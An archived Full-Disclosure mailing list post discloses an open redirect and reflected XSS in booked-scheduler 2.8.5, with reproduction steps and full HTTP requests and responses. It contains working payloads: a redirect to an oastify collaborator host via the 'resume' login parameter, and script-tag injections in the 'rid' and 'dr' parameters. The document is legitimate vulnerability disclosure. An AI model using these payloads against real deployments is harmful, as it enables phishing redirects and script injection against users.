lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAF2Wu1Z0kEphk02Y-D-yfZ7E7rXSWo1ycw_-hpU0h1Z9mztxbw@mail.gmail.com>
Date: Mon, 28 Oct 2024 13:11:12 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Open Redirect / Reflected XSS - booked-schedulerv2.8.5

# Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5
# Date: 10/2024
# Exploit Author: Andrey Stoykov
# Version: 2.8.5
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.html
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.html


Open Redirect:

Steps to Reproduce:

1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
2. In the "resume" parameter add the redirect URL e.g. Burp Collab
3. Forward the request

index.php

// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=
https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Reflected XSS:

reservation.php

// HTTP GET request

GET
/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>
HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;
new_version=v%3D2.8.5%2Cfs%3D1728734988;
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14003

<h5><a
href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return
to the last page that you were on</a></h5>
</div>


schedule.php


// HTTP GET request

GET
/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>
HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;
resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;
schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7853

<h5><a
href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return
to the last page that you were on
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ